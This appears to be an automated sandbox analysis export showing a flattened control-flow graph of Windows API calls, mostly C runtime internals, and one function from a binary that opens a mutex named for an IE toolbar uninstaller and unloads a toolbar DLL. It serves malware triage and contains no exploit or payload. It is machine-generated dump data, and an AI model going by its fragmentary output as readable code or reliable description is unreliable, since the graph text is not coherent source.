GetLastError 3306->3308 3310 301067 3307->3310 3311 301056 PathFileExistsW 3307->3311 3308->3307 3309 30102c 3308->3309 3309->3215 3313 301084 LoadLibraryW 3310->3313 3311->3310 3312 30106e PathFileExistsW 3311->3312 3312->3310 3312->3313 3314 301091 GetProcAddress 3313->3314 3315 3010aa CloseHandle CoUninitialize 3313->3315 3316 3010a1 3314->3316 3317 3010a3 FreeLibrary 3314->3317 3318 3010c2 3315->3318 3319 3010bb LocalFree 3315->3319 3316->3317 3317->3315 3318->3215 3319->3318 3846 301555 3320->3846 3322 301692 3322->3216 3324 3010e9 3323->3324 3325 3010ee 3323->3325 3326 3018c4 __FF_MSGBANNER 66 API calls 3324->3326 3327 301719 __NMSG_WRITE 66 API calls 3325->3327 3326->3325 3328 3010f6 3327->3328 3329 301465 __mtinitlocknum 3 API calls 3328->3329 3330 301100 3329->3330 3330->3189 3332 3018c4 __FF_MSGBANNER 66 API calls 3331->3332 3333 30141b 3332->3333 3334 301719 __NMSG_WRITE 66 API calls 3333->3334 3335 301423 3334->3335 3336 3020f9 __decode_pointer 6 API calls 3335->3336 3337 3011ad 3336->3337 3337->3197 3339 301555 _doexit 66 API calls 3338->3339 3340 3016b8 3339->3340 3340->3219 3342 3013ec Sleep GetModuleHandleW 3341->3342 3343 30140a 3342->3343 3344 30140e 3342->3344 3343->3342 3343->3344 3344->3225 3411 3020f0 3345->3411 3347 3016d3 __init_pointers __initp_misc_winsig 3414 302913 3347->3414 3350 30207e __encode_pointer 6 API calls 3351 30170f 3350->3351 3352 30207e TlsGetValue 3351->3352 3353 302096 3352->3353 3354 3020b7 GetModuleHandleW 3352->3354 3353->3354 3355 3020a0 TlsGetValue 3353->3355 3356 3020d2 GetProcAddress 3354->3356 3357 3020c7 3354->3357 3359 3020ab 3355->3359 3361 3020af 3356->3361 3358 3013e1 __crt_waiting_on_module_handle 2 API calls 3357->3358 3360 3020cd 3358->3360 3359->3354 3359->3361 3360->3356 3360->3361 3361->3240 3363 30292f 3362->3363 3365 3025a8 3363->3365 3417 30317c 3363->3417 3365->3227 3366 3020f9 TlsGetValue 3365->3366 3367 302111 3366->3367 3368 302132 GetModuleHandleW 3366->3368 3367->3368 3371 30211b TlsGetValue 3367->3371 3369 302142 3368->3369 3370 30214d GetProcAddress 3368->3370 3372 3013e1 __crt_waiting_on_module_handle 2 API calls 3369->3372 3374 30212a 3370->3374 3375 302126 3371->3375 3373 302148 3372->3373 3373->3370 3373->3374 3374->3227 3376 303730 3374->3376 3375->3368 3375->3374 3378 303739 3376->3378 3379 3025d5 3378->3379 3380 303757 Sleep 3378->3380 3422 30557f 3378->3422 3379->3227 3379->3252 3381 30376c 3380->3381 3381->3378 3381->3379 3706 30264c 3382->3706 3384 3021f1 GetModuleHandleW 3385 302201 3384->3385 3386 302207 3384->3386 3389 3013e1 __crt_waiting_on_module_handle 2 API calls 3385->3389 3387 302243 3386->3387 3388 30221f GetProcAddress GetProcAddress 3386->3388 3390 302aa0 __lock 62 API calls 3387->3390 3388->3387 3389->3386 3391 302262 InterlockedIncrement 3390->3391 3707 3022ba 3391->3707 3394 302aa0 __lock 62 API calls 3395 302283 3394->3395 3710 303c9e InterlockedIncrement 3395->3710 3397 3022a1 3722 3022c3 3397->3722 3399 3022ae __freefls@4 3399->3256 3401 3021b2 3400->3401 3402 3021be 3400->3402 3403 3020f9 __decode_pointer 6 API calls 3401->3403 3404 3021d2 TlsFree 3402->3404 3405 3021e0 3402->3405 3403->3402 3404->3405 3406 3029a3 3405->3406 3407 30298b DeleteCriticalSection 3405->3407 3409 3029b5 DeleteCriticalSection 3406->3409 3410 3029c3 3406->3410 3408 3035ee __freefls@4 66 API calls 3407->3408 3408->3405 3409->3406 3410->3233 3412 30207e __encode_pointer 6 API calls 3411->3412 3413 3020f7 3412->3413 3413->3347 3415 30207e __encode_pointer 6 API calls 3414->3415 3416 301705 3415->3416 3416->3350 3421 30264c 3417->3421 3419 303188 InitializeCriticalSectionAndSpinCount 3420 3031cc __freefls@4 3419->3420 3420->3363 3421->3419 3423 30558b __freefls@4 3422->3423 3424 3055a3 3423->3424 3433 3055c2 __setmbcp_nolock 3423->3433 3435 302c72 3424->3435 3428 305634 HeapAlloc 3428->3433 3429 3055b8 __freefls@4 3429->3378 3433->3428 3433->3429 3441 302aa0 3433->3441 3448 304dc3 3433->3448 3454 30567b 3433->3454 3457 3031eb 3433->3457 3460 3022cc GetLastError 3435->3460 3437 302c77 3438 302c0a 3437->3438 3439 3020f9 __decode_pointer 6 API calls 3438->3439 3440 302c1a __invoke_watson 3439->3440 3442 302ab5 3441->3442 3443 302ac8 EnterCriticalSection 3441->3443 3502 3029dd 3442->3502 3443->3433 3445 302abb 3445->3443 3446 301411 __amsg_exit 65 API calls 3445->3446 3447 302ac7 3446->3447 3447->3443 3450 304df1 3448->3450 3449 304e8a 3453 304e93 3449->3453 3701 3049da 3449->3701 3450->3449 3450->3453 3694 30492a 3450->3694 3453->3433 3705 3029c6 LeaveCriticalSection 3454->3705 3456 305682 3456->3433 3458 3020f9 __decode_pointer 6 API calls 3457->3458 3459 3031fb 3458->3459 3459->3433 3474 302174 TlsGetValue 3460->3474 3462 302339 SetLastError 3462->3437 3464 303730 __calloc_crt 63 API calls 3465 3022f7 3464->3465 3465->3462 3466 3020f9 __decode_pointer 6 API calls 3465->3466 3467 302311 3466->3467 3468 302330 3467->3468 3469 302318 3467->3469 3479 3035ee 3468->3479 3470 3021e5 __getptd_noexit 63 API calls 3469->3470 3472 302320 GetCurrentThreadId 3470->3472 3472->3462 3473 302336 3473->3462 3475 3021a4 3474->3475 3476 302189 3474->3476 3475->3462 3475->3464 3477 3020f9 __decode_pointer 6 API calls 3476->3477 3478 302194 TlsSetValue 3477->3478 3478->3475 3481 3035fa __freefls@4 3479->3481 3480 303673 _realloc __freefls@4 3480->3473 3481->3480 3483 302aa0 __lock 64 API calls 3481->3483 3491 303639 3481->3491 3482 30364e HeapFree 3482->3480 3484 303660 3482->3484 3487 303611 ___sbh_find_block 3483->3487 3485 302c72 __set_error_mode 64 API calls 3484->3485 3486 303665 GetLastError 3485->3486 3486->3480 3488 30362b 3487->3488 3492 304614 3487->3492 3498 303644 3488->3498 3491->3480 3491->3482 3494 304653 3492->3494 3497 3048f5 ___sbh_free_block 3492->3497 3493 30483f VirtualFree 3495 3048a3 3493->3495 3494->3493 3494->3497 3496 3048b2 VirtualFree HeapFree 3495->3496 3495->3497 3496->3497 3497->3488 3501 3029c6 LeaveCriticalSection 3498->3501 3500 30364b 3500->3491 3501->3500 3503 3029e9 __freefls@4 3502->3503 3504 302a0f 3503->3504 3528 3018c4 3503->3528 3510 302a1f __freefls@4 3504->3510 3574 3036eb 3504->3574 3510->3445 3512 302a40 3514 302aa0 __lock 66 API calls 3512->3514 3513 302a31 3516 302c72 __set_error_mode 66 API calls 3513->3516 3517 302a47 3514->3517 3516->3510 3518 302a7b 3517->3518 3519 302a4f 3517->3519 3521 3035ee __freefls@4 66 API calls 3518->3521 3520 30317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3519->3520 3522 302a5a 3520->3522 3527 302a6c 3521->3527 3524 3035ee __freefls@4 66 API calls 3522->3524 3522->3527 3525 302a66 3524->3525 3526 302c72 __set_error_mode 66 API calls 3525->3526 3526->3527 3579 302a97 3527->3579 3582 3035a3 3528->3582 3531 3035a3 __set_error_mode 66 API calls 3533 3018d8 3531->3533 3532 301719 __NMSG_WRITE 66 API calls 3534 3018f0 3532->3534 3533->3532 3535 3018fa 3533->3535 3536 301719 __NMSG_WRITE 66 API calls 3534->3536 3537 301719 3535->3537 3536->3535 3538 30172d 3537->3538 3539 3035a3 __set_error_mode 63 API calls 3538->3539 3570 301888 3538->3570 3540 30174f 3539->3540 3541 30188d GetStdHandle 3540->3541 3543 3035a3 __set_error_mode 63 API calls 3540->3543 3542 30189b _strlen 3541->3542 3541->3570 3546 3018b4 WriteFile 3542->3546 3542->3570 3544 301760 3543->3544 3544->3541 3545 301772 3544->3545 3545->3570 3588 30353b 3545->3588 3546->3570 3549 3017a8 GetModuleFileNameA 3551 3017c6 3549->3551 3555 3017e9 _strlen 3549->3555 3553 30353b _strcpy_s 63 API calls 3551->3553 3554 3017d6 3553->3554 3554->3555 3556 302ae2 __invoke_watson 10 API calls 3554->3556 3567 30182c 3555->3567 3604 3033f0 3555->3604 3556->3555 3561 30337c _strcat_s 63 API calls 3564 301864 3561->3564 3562 302ae2 __invoke_watson 10 API calls 3563 301850 3562->3563 3563->3561 3566 301875 3564->3566 3568 302ae2 __invoke_watson 10 API calls 3564->3568 3565 302ae2 __invoke_watson 10 API calls 3565->3567 3622 303213 3566->3622 3613 30337c 3567->3613 3568->3566 3571 301465 3570->3571 3660 30143a GetModuleHandleW 3571->3660 3576 3036f4 3574->3576 3577 302a2a 3576->3577 3578 30370b Sleep 3576->3578 3664 3054b5 3576->3664 3577->3512 3577->3513 3578->3576 3693 3029c6 LeaveCriticalSection 3579->3693 3581 302a9e 3581->3510 3583 3035b2 3582->3583 3584 302c72 __set_error_mode 66 API calls 3583->3584 3585 3018cb 3583->3585 3586 3035d5 3584->3586 3585->3531 3585->3533 3587 302c0a __set_error_mode 6 API calls 3586->3587 3587->3585 3589 30354c 3588->3589 3591 303553 3588->3591 3589->3591 3595 303579 3589->3595 3590 302c72 __set_error_mode 66 API calls 3592 303558 3590->3592 3591->3590 3593 302c0a __set_error_mode 6 API calls 3592->3593 3594 301794 3593->3594 3594->3549 3597 302ae2 3594->3597 3595->3594 3596 302c72 __set_error_mode 66 API calls 3595->3596 3596->3592 3649 305320 3597->3649 3599 302b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3600 302beb GetCurrentProcess TerminateProcess 3599->3600 3601 302bdf __invoke_watson 3599->3601 3651 3010cc 3600->3651 3601->3600 3603 3017a5 3603->3549 3607 303402 3604->3607 3605 303406 3606 302c72 __set_error_mode 66 API calls 3605->3606 3608 301819 3605->3608 3612 303422 3606->3612 3607->3605 3607->3608 3610 30344c 3607->3610 3608->3565 3608->3567 3609 302c0a __set_error_mode 6 API calls 3609->3608 3610->3608 3611 302c72 __set_error_mode 66 API calls 3610->3611 3611->3612 3612->3609 3615 303394 3613->3615 3616 30338d 3613->3616 3614 302c72 __set_error_mode 66 API calls 3617 303399 3614->3617 3615->3614 3616->3615 3620 3033c8 3616->3620 3618 302c0a __set_error_mode 6 API calls 3617->3618 3619 30183f 3618->3619 3619->3562 3619->3563 3620->3619 3621 302c72 __set_error_mode 66 API calls 3620->3621 3621->3617 3623 3020f0 __init_pointers 6 API calls 3622->3623 3624 303223 3623->3624 3625 303236 LoadLibraryA 3624->3625 3629 3032be 3624->3629 3627 303360 3625->3627 3628 30324b GetProcAddress 3625->3628 3626 3032e8 3632 3020f9 __decode_pointer 6 API calls 3626->3632 3646 303313 3626->3646 3627->3570 3628->3627 3630 303261 3628->3630 3629->3626 3633 3020f9 __decode_pointer 6 API calls 3629->3633 3634 30207e __encode_pointer 6 API calls 3630->3634 3631 3020f9 __decode_pointer 6 API calls 3631->3627 3635 30332b 3632->3635 3636 3032db 3633->3636 3637 303267 GetProcAddress 3634->3637 3644 3020f9 __decode_pointer 6 API calls 3635->3644 3635->3646 3638 3020f9 __decode_pointer 6 API calls 3636->3638 3639 30207e __encode_pointer 6 API calls 3637->3639 3638->3626 3640 30327c GetProcAddress 3639->3640 3641 30207e __encode_pointer 6 API calls 3640->3641 3642 303291 GetProcAddress 3641->3642 3643 30207e __encode_pointer 6 API calls 3642->3643 3645 3032a6 3643->3645 3644->3646 3645->3629 3647 3032b0 GetProcAddress 3645->3647 3646->3631 3648 30207e __encode_pointer 6 API calls 3647->3648 3648->3629 3650 30532c __VEC_memzero 3649->3650 3650->3599 3652 3010d4 3651->3652 3653 3010d6 IsDebuggerPresent 3651->3653 3652->3603 3659 3028d2 3653->3659 3656 301358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3657 301375 __invoke_watson 3656->3657 3658 30137d GetCurrentProcess TerminateProcess 3656->3658 3657->3658 3658->3603 3659->3656 3661 301463 ExitProcess 3660->3661 3662 30144e GetProcAddress 3660->3662 3662->3661 3663 30145e 3662->3663 3663->3661 3665 305568 3664->3665 3674 3054c7 3664->3674 3666 3031eb _malloc 6 API calls 3665->3666 3667 30556e 3666->3667 3669 302c72 __set_error_mode 65 API calls 3667->3669 3668 3018c4 __FF_MSGBANNER 65 API calls 3668->3674 3680 305560 3669->3680 3671 301719 __NMSG_WRITE 65 API calls 3671->3674 3672 305524 HeapAlloc 3672->3674 3673 301465 __mtinitlocknum 3 API calls 3673->3674 3674->3668 3674->3671 3674->3672 3674->3673 3675 305554 3674->3675 3676 3031eb _malloc 6 API calls 3674->3676 3678 305559 3674->3678 3674->3680 3681 305466 3674->3681 3677 302c72 __set_error_mode 65 API calls 3675->3677 3676->3674 3677->3678 3679 302c72 __set_error_mode 65 API calls 3678->3679 3679->3680 3680->3576 3682 305472 __freefls@4 3681->3682 3683 3054a3 __freefls@4 3682->3683 3684 302aa0 __lock 66 API calls 3682->3684 3683->3674 3685 305488 3684->3685 3686 304dc3 ___sbh_alloc_block 5 API calls 3685->3686 3687 305493 3686->3687 3689 3054ac 3687->3689 3692 3029c6 LeaveCriticalSection 3689->3692 3691 3054b3 3691->3683 3692->3691 3693->3581 3695 304971 HeapAlloc 3694->3695 3696 30493d HeapReAlloc 3694->3696 3698 304994 VirtualAlloc 3695->3698 3699 30495b 3695->3699 3697 30495f 3696->3697 3696->3699 3697->3695 3698->3699 3700 3049ae HeapFree 3698->3700 3699->3449 3700->3699 3702 3049f1 VirtualAlloc 3701->3702 3704 304a38 3702->3704 3704->3453 3705->3456 3706->3384 3725 3029c6 LeaveCriticalSection 3707->3725 3709 30227c 3709->3394 3711 303cbc InterlockedIncrement 3710->3711 3712 303cbf 3710->3712 3711->3712 3713 303cc9 InterlockedIncrement 3712->3713 3714 303ccc 3712->3714 3713->3714 3715 303cd6 InterlockedIncrement 3714->3715 3716 303cd9 3714->3716 3715->3716 3717 303ce3 InterlockedIncrement 3716->3717 3719 303ce6 3716->3719 3717->3719 3718 303cff InterlockedIncrement 3718->3719 3719->3718 3720 303d0f InterlockedIncrement 3719->3720 3721 303d1a InterlockedIncrement 3719->3721 3720->3719 3721->3397 3726 3029c6 LeaveCriticalSection 3722->3726 3724 3022ca 3724->3399 3725->3709 3726->3724 3727->3259 3729 303808 3728->3729 3730 30382f __VEC_memcpy 3729->3730 3731 301dd3 3729->3731 3730->3731 3731->3278 3733 303694 3732->3733 3734 30368d 3732->3734 3735 302c72 __set_error_mode 66 API calls 3733->3735 3734->3733 3736 3036c0 3734->3736 3740 303699 3735->3740 3738 3036a8 3736->3738 3739 302c72 __set_error_mode 66 API calls 3736->3739 3737 302c0a __set_error_mode 6 API calls 3737->3738 3738->3297 3739->3740 3740->3737 3742 302dc9 3741->3742 3743 30207e __encode_pointer 6 API calls 3742->3743 3744 302de1 3742->3744 3743->3742 3744->3303 3748 302d70 3745->3748 3747 302db9 3747->3305 3749 302d7c __freefls@4 3748->3749 3756 30147d 3749->3756 3755 302d9d __freefls@4 3755->3747 3757 302aa0 __lock 66 API calls 3756->3757 3758 301484 3757->3758 3759 302c85 3758->3759 3760 3020f9 __decode_pointer 6 API calls 3759->3760 3761 302c99 3760->3761 3762 3020f9 __decode_pointer 6 API calls 3761->3762 3763 302ca9 3762->3763 3764 302d2c 3763->3764 3779 30539a 3763->3779 3776 302da6 3764->3776 3766 302d13 3767 30207e __encode_pointer 6 API calls 3766->3767 3768 302d21 3767->3768 3771 30207e __encode_pointer 6 API calls 3768->3771 3769 302ceb 3769->3764 3773 30377c __realloc_crt 73 API calls 3769->3773 3774 302d01 3769->3774 3770 302cc7 3770->3766 3770->3769 3792 30377c 3770->3792 3771->3764 3773->3774 3774->3764 3775 30207e __encode_pointer 6 API calls 3774->3775 3775->3766 3842 301486 3776->3842 3780 3053a6 __freefls@4 3779->3780 3781 3053d3 3780->3781 3782 3053b6 3780->3782 3783 305414 HeapSize 3781->3783 3785 302aa0 __lock 66 API calls 3781->3785 3784 302c72 __set_error_mode 66 API calls 3782->3784 3788 3053cb __freefls@4 3783->3788 3786 3053bb 3784->3786 3789 3053e3 ___sbh_find_block 3785->3789 3787 302c0a __set_error_mode 6 API calls 3786->3787 3787->3788 3788->3770 3797 305434 3789->3797 3795 303785 3792->3795 3794 3037c4 3794->3769 3795->3794 3796 3037a5 Sleep 3795->3796 3801 30569d 3795->3801 3796->3795 3800 3029c6 LeaveCriticalSection 3797->3800 3799 30540f 3799->3783 3799->3788 3800->3799 3802 3056a9 __freefls@4 3801->3802 3803 3056b0 3802->3803 3804 3056be 3802->3804 3805 3054b5 _malloc 66 API calls 3803->3805 3806 3056d1 3804->3806 3807 3056c5 3804->3807 3823 3056b8 _realloc __freefls@4 3805->3823 3814 305843 3806->3814 3836 3056de ___sbh_resize_block ___sbh_find_block 3806->3836 3808 3035ee __freefls@4 66 API calls 3807->3808 3808->3823 3809 305876 3810 3031eb _malloc 6 API calls 3809->3810 3813 30587c 3810->3813 3811 302aa0 __lock 66 API calls 3811->3836 3812 305848 HeapReAlloc 3812->3814 3812->3823 3815 302c72 __set_error_mode 66 API calls 3813->3815 3814->3809 3814->3812 3816 30589a 3814->3816 3817 3031eb _malloc 6 API calls 3814->3817 3820 305890 3814->3820 3815->3823 3818 302c72 __set_error_mode 66 API calls 3816->3818 3816->3823 3817->3814 3821 3058a3 GetLastError 3818->3821 3822 302c72 __set_error_mode 66 API calls 3820->3822 3821->3823 3825 305811 3822->3825 3823->3795 3824 305769 HeapAlloc 3824->3836 3825->3823 3827 305816 GetLastError 3825->3827 3826 3057be HeapReAlloc 3826->3836 3827->3823 3828 304dc3 ___sbh_alloc_block 5 API calls 3828->3836 3829 305829 3829->3823 3831 302c72 __set_error_mode 66 API calls 3829->3831 3830 3031eb _malloc 6 API calls 3830->3836 3833 305836 3831->3833 3832 304614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3832->3836 3833->3821 3833->3823 3834 30580c 3837 302c72 __set_error_mode 66 API calls 3834->3837 3835 3037f0 __VEC_memcpy _realloc 3835->3836 3836->3809 3836->3811 3836->3823 3836->3824 3836->3826 3836->3828 3836->3829 3836->3830 3836->3832 3836->3834 3836->3835 3838 3057e1 3836->3838 3837->3825 3841 3029c6 LeaveCriticalSection 3838->3841 3840 3057e8 3840->3836 3841->3840 3845 3029c6 LeaveCriticalSection 3842->3845 3844 30148d 3844->3755 3845->3844 3847 301561 __freefls@4 3846->3847 3848 302aa0 __lock 66 API calls 3847->3848 3849 301568 3848->3849 3850 301631 __initterm 3849->3850 3852 301594 3849->3852 3865 30166c 3850->3865 3854 3020f9 __decode_pointer 6 API calls 3852->3854 3856 30159f 3854->3856 3855 301669 __freefls@4 3855->3322 3858 301621 __initterm 3856->3858 3860 3020f9 __decode_pointer 6 API calls 3856->3860 3858->3850 3859 301660 3861 301465 __mtinitlocknum 3 API calls 3859->3861 3864 3015b4 3860->3864 3861->3855 3862 3020f9 6 API calls __decode_pointer 3862->3864 3863 3020f0 6 API calls __init_pointers 3863->3864 3864->3858 3864->3862 3864->3863 3866 301672 3865->3866 3867 30164d 3865->3867 3870 3029c6 LeaveCriticalSection 3866->3870 3867->3855 3869 3029c6 LeaveCriticalSection 3867->3869 3869->3859 3870->3867 4196 304247 4206 3041cb 4196->4206 4199 304272 setSBCS 4200 3010cc __setmbcp_nolock 5 API calls 4199->4200 4201 30442a 4200->4201 4202 3042b6 IsValidCodePage 4202->4199 4203 3042c8 GetCPInfo 4202->4203 4203->4199 4204 3042db __setmbcp_nolock 4203->4204 4213 303f0d GetCPInfo 4204->4213 4223 304144 4206->4223 4209 304208 4211 30420d GetACP 4209->4211 4212 3041fa 4209->4212 4210 3041ea GetOEMCP 4210->4212 4211->4212 4212->4199 4212->4202 4212->4204 4216 303f41 __setmbcp_nolock 4213->4216 4222 303ff3 4213->4222 4278 305fe2 4216->4278 4218 3010cc __setmbcp_nolock 5 API calls 4220 30409e 4218->4220 4220->4204 4221 306415 ___crtLCMapStringA 101 API calls 4221->4222 4222->4218 4224 304157 4223->4224 4225 3041a4 4223->4225 4226 302345 __getptd 66 API calls 4224->4226 4225->4209 4225->4210 4227 30415c 4226->4227 4228 304184 4227->4228 4231 303e04 4227->4231 4228->4225 4246 3040a0 4228->4246 4232 303e10 __freefls@4 4231->4232 4233 302345 __getptd 66 API calls 4232->4233 4234 303e15 4233->4234 4235 303e43 4234->4235 4236 303e27 4234->4236 4237 302aa0 __lock 66 API calls 4235->4237 4238 302345 __getptd 66 API calls 4236->4238 4239 303e4a 4237->4239 4240 303e2c 4238->4240 4262 303dc6 4239->4262 4244 303e3a __freefls@4 4240->4244 4245 301411 __amsg_exit 66 API calls 4240->4245 4244->4228 4245->4244 4247 3040ac __freefls@4 4246->4247 4248 302345 __getptd 66 API calls 4247->4248 4249 3040b1 4248->4249 4250 302aa0 __lock 66 API calls 4249->4250 4253 3040c3 4249->4253 4251 3040e1 4250->4251 4252 30412a 4251->4252 4254 304112 InterlockedIncrement 4251->4254 4255 3040f8 InterlockedDecrement 4251->4255 4274 30413b 4252->4274 4257 301411 __amsg_exit 66 API calls 4253->4257 4258 3040d1 __freefls@4 4253->4258 4254->4252 4255->4254 4259 304103 4255->4259 4257->4258 4258->4225 4259->4254 4260 3035ee __freefls@4 66 API calls 4259->4260 4261 304111 4260->4261 4261->4254 4263 303dca 4262->4263 4269 303dfc 4262->4269 4264 303c9e ___addlocaleref 8 API calls 4263->4264 4263->4269 4265 303ddd 4264->4265 4266 303d2d ___removelocaleref 8 API calls 4265->4266 4265->4269 4267 303de8 4266->4267 4268 303b55 ___freetlocinfo 66 API calls 4267->4268 4267->4269 4268->4269 4270 303e6e 4269->4270 4273 3029c6 LeaveCriticalSection 4270->4273 4272 303e75 4272->4240 4273->4272 4277 3029c6 LeaveCriticalSection 4274->4277 4276 304142 4276->4253 4277->4276 4279 304144 _LocaleUpdate::_LocaleUpdate 76 API calls 4278->4279 4280 305ff5 4279->4280 4288 305e28 4280->4288 4283 306415 4284 304144 _LocaleUpdate::_LocaleUpdate 76 API calls 4283->4284 4285 306428 4284->4285 4376 306070 4285->4376 4289 305e74 4288->4289 4290 305e49 GetStringTypeW 4288->4290 4291 305e61 4289->4291 4293 305f5b 4289->4293 4290->4291 4292 305e69 GetLastError 4290->4292 4294 305ead MultiByteToWideChar 4291->4294 4311 305f55 4291->4311 4292->4289 4316 306b1a GetLocaleInfoA 4293->4316 4299 305eda 4294->4299 4294->4311 4296 3010cc __setmbcp_nolock 5 API calls 4298 303fae 4296->4298 4298->4283 4300 305eef __alloca_probe_16 __setmbcp_nolock 4299->4300 4303 3054b5 _malloc 66 API calls 4299->4303 4305 305f28 MultiByteToWideChar 4300->4305 4300->4311 4301 305fac GetStringTypeA 4302 305fc7 4301->4302 4301->4311 4306 3035ee __freefls@4 66 API calls 4302->4306 4303->4300 4307 305f3e GetStringTypeW 4305->4307 4308 305f4f 4305->4308 4306->4311 4307->4308 4312 305446 4308->4312 4311->4296 4313 305452 4312->4313 4314 305463 4312->4314 4313->4314 4315 3035ee __freefls@4 66 API calls 4313->4315 4314->4311 4315->4314 4317 306b4d 4316->4317 4319 306b48 4316->4319 4347 306b04 4317->4347 4320 3010cc __setmbcp_nolock 5 API calls 4319->4320 4321 305f7f 4320->4321 4321->4301 4321->4311 4322 306b63 4321->4322 4323 306c2d 4322->4323 4324 306ba3 GetCPInfo 4322->4324 4327 3010cc __setmbcp_nolock 5 API calls 4323->4327 4325 306c18 MultiByteToWideChar 4324->4325 4326 306bba 4324->4326 4325->4323 4331 306bd3 _strlen 4325->4331 4326->4325 4328 306bc0 GetCPInfo 4326->4328 4329 305fa0 4327->4329 4328->4325 4330 306bcd 4328->4330 4329->4301 4329->4311 4330->4325 4330->4331 4332 3054b5 _malloc 66 API calls 4331->4332 4336 306c05 __alloca_probe_16 __setmbcp_nolock 4331->4336 4332->4336 4333 306c62 MultiByteToWideChar 4334 306c99 4333->4334 4335 306c7a 4333->4335 4337 305446 __freea 66 API calls 4334->4337 4338 306c81 WideCharToMultiByte 4335->4338 4339 306c9e 4335->4339 4336->4323 4336->4333 4337->4323 4338->4334 4340 306ca9 WideCharToMultiByte 4339->4340 4341 306cbd 4339->4341 4340->4334 4340->4341 4342 303730 __calloc_crt 66 API calls 4341->4342 4343 306cc5 4342->4343 4343->4334 4344 306cce WideCharToMultiByte 4343->4344 4344->4334 4345 306ce0 4344->4345 4346 3035ee __freefls@4 66 API calls 4345->4346 4346->4334 4350 306f7a 4347->4350 4351 306f93 4350->4351 4354 306d4b 4351->4354 4355 304144 _LocaleUpdate::_LocaleUpdate 76 API calls 4354->4355 4358 306d60 4355->4358 4356 306d72 4357 302c72 __set_error_mode 66 API calls 4356->4357 4359 306d77 4357->4359 4358->4356 4362 306daf 4358->4362 4360 302c0a __set_error_mode 6 API calls 4359->4360 4363 306b15 4360->4363 4364 306df4 4362->4364 4366 3069e5 4362->4366 4363->4319 4364->4363 4365 302c72 __set_error_mode 66 API calls 4364->4365 4365->4363 4367 304144 _LocaleUpdate::_LocaleUpdate 76 API calls 4366->4367 4368 3069f9 4367->4368 4372 306a06 4368->4372 4373 306acc 4368->4373 4371 305fe2 ___crtGetStringTypeA 90 API calls 4371->4372 4372->4362 4374 304144 _LocaleUpdate::_LocaleUpdate 76 API calls 4373->4374 4375 306a2e 4374->4375 4375->4371 4377 306091 LCMapStringW 4376->4377 4380 3060ac 4376->4380 4378 3060b4 GetLastError 4377->4378 4377->4380 4378->4380 4379 3062aa 4382 306b1a ___ansicp 90 API calls 4379->4382 4380->4379 4381 306106 4380->4381 4383 30611f MultiByteToWideChar 4381->4383 4406 3062a1 4381->4406 4384 3062d2 4382->4384 4389 30614c 4383->4389 4383->4406 4387 3063c6 LCMapStringA 4384->4387 4388 3062eb 4384->4388 4384->4406 4385 3010cc __setmbcp_nolock 5 API calls 4386 303fce 4385->4386 4386->4221 4401 306322 4387->4401 4390 306b63 ___convertcp 73 API calls 4388->4390 4392 306165 __alloca_probe_16 4389->4392 4393 3054b5 _malloc 66 API calls 4389->4393 4394 3062fd 4390->4394 4391 30619d MultiByteToWideChar 4395 3061b6 LCMapStringW 4391->4395 4418 306298 4391->4418 4392->4391 4392->4406 4393->4392 4398 306307 LCMapStringA 4394->4398 4394->4406 4396 3061d7 4395->4396 4395->4418 4402 3061e0 4396->4402 4403 306209 4396->4403 4397 3035ee __freefls@4 66 API calls 4400 3063ed 4397->4400 4398->4401 4408 306329 4398->4408 4399 305446 __freea 66 API calls 4399->4406 4404 3035ee __freefls@4 66 API calls 4400->4404 4400->4406 4401->4397 4401->4400 4405 3061f2 LCMapStringW 4402->4405 4402->4418 4413 3054b5 _malloc 66 API calls 4403->4413 4416 306224 __alloca_probe_16 4403->4416 4404->4406 4405->4418 4406->4385 4407 306258 LCMapStringW 4409 306270 WideCharToMultiByte 4407->4409 4410 306292 4407->4410 4411 3054b5 _malloc 66 API calls 4408->4411 4412 30633a __alloca_probe_16 __setmbcp_nolock 4408->4412 4409->4410 4414 305446 __freea 66 API calls 4410->4414 4411->4412 4412->4401 4415 306378 LCMapStringA 4412->4415 4413->4416 4414->4418 4419 306394 4415->4419 4420 306398 4415->4420 4416->4407 4416->4418 4418->4399 4422 305446 __freea 66 API calls 4419->4422 4421 306b63 ___convertcp 73 API calls 4420->4421 4421->4419 4422->4401 4423 3067c8 RtlUnwind 3975 30458d 3978 3029c6 LeaveCriticalSection 3975->3978 3977 304594 3978->3977 3903 30122e 3906 3018fe 3903->3906 3907 3022cc __getptd_noexit 66 API calls 3906->3907 3908 30123f 3907->3908

                                                                                  Executed Functions

                                                                                  Function 00301000 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00301006
                                                                                  • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00301013
                                                                                  • GetLastError.KERNEL32 ref: 0030101F
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 00301040
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 00301047
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00301061
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00301073
                                                                                  • LoadLibraryW.KERNELBASE(?), ref: 00301085
                                                                                  • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00301097
                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 003010A4
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 003010AB
                                                                                  • CoUninitialize.COMBASE ref: 003010B1
                                                                                  • LocalFree.KERNEL32(00000000), ref: 003010BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000029.00000002.3043464188.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true
                                                                                  • Associated: 00000029.00000002.3043411635.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043541318.0000000000308000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043576776.000000000030A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                  • Associated: 00000029.00000002.3043630273.000000000030C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_41_2_300000_5r1Aib1.jbxd
